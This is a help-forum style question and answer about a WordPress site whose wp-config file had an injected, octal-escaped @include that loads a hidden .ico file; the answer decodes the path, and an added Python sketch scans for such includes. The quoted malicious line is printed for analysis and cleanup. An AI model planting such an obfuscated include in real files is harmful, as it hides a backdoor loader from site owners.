I've had a strange @include in the wp-config file of one of my WordPress websites that was actually calling a malicious script. I cleared the following line of code so I can stop its execution, but I want to find out where the corrupted file is.
/*9cff9*/
@include "\057ho\155e/\146ie\154de\162d/\160ub\154ic\137ht\155l/\167p-\151nc\154ud\145s/\124ex\164/D\151ff\057.9\1440a\0656a\143.i\143o";
/*9cff9*/
Can you also tell me how you found out what the "encoding" is, so I know for the future?
It's a mixture of standard letters and octal coded escaped ASCII codes: http://php.net/manual/de/regexp.reference.escape.php
"\057ho\155e/\146ie\154de"
\057 => octal value 57 is char 47 decimal, which is the Forward Slash
ho => ho
\155 => octal 155 = 109 dec, which is a "m"
e => e
etc.
echo "\057ho\155e/\146ie\154de\162d/\160ub\154ic\137ht\155l/\167p-\151nc\154ud\145s/\124ex\164/D\151ff\057.9\1440a\0656a\143.i\143o";
# /home/fielderd/public_html/wp-includes/Text/Diff/.9d0a56ac.ico
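Added example, not part of the original question or answer: a Python sketch that decodes the octal (`\NNN`) and hex (`\xHH`) escapes of a PHP double-quoted string and lists include/require statements that hide their path this way, without executing any PHP. The function names, the regular expressions and the two extra sample lines are assumptions made for illustration; the `@include` line is the one from the question.

```python
import re

# PHP double-quoted strings accept \NNN (1-3 octal digits) and \xHH (1-2 hex digits).
# An escaped backslash (\\) is matched first so that "\\057" is not misread as an octal escape.
_ESCAPE = re.compile(r'\\\\|\\([0-7]{1,3})|\\x([0-9A-Fa-f]{1,2})')
# include/require (optionally silenced with @) followed by a double-quoted literal.
_INCLUDE = re.compile(r'@?\b(?:include|require)(?:_once)?\s*\(?\s*"((?:[^"\\]|\\.)*)"')

def _repl(m):
    if m.group(1):
        return chr(int(m.group(1), 8) & 0xFF)  # PHP wraps octal values above \377
    if m.group(2):
        return chr(int(m.group(2), 16))
    return "\\"  # escaped backslash

def decode_php_escapes(literal):
    """Decode octal/hex escapes; other escapes (\\n, \\t, \\$ ...) are left untouched."""
    return _ESCAPE.sub(_repl, literal)

def find_obfuscated_includes(source):
    """Return (line_number, decoded_path) for includes whose literal uses octal/hex escapes."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for m in _INCLUDE.finditer(line):
            raw = m.group(1)
            if any(e.group(1) or e.group(2) for e in _ESCAPE.finditer(raw)):
                hits.append((lineno, decode_php_escapes(raw)))
    return hits

# Sample input: the injected lines from the question, plus two constructed
# benign lines that must not be reported.
SAMPLE = r'''<?php
/*9cff9*/
@include "\057ho\155e/\146ie\154de\162d/\160ub\154ic\137ht\155l/\167p-\151nc\154ud\145s/\124ex\164/D\151ff\057.9\1440a\0656a\143.i\143o";
/*9cff9*/
include "wp-content/plain.php";
require_once ABSPATH . 'wp-settings.php';
'''

if __name__ == "__main__":
    for lineno, path in find_obfuscated_includes(SAMPLE):
        print(f"line {lineno}: include resolves to {path}")
```

Running the same function over every `.php` file in the site tree shows whether other files carry a similarly escaped include and which dropped file each one points to.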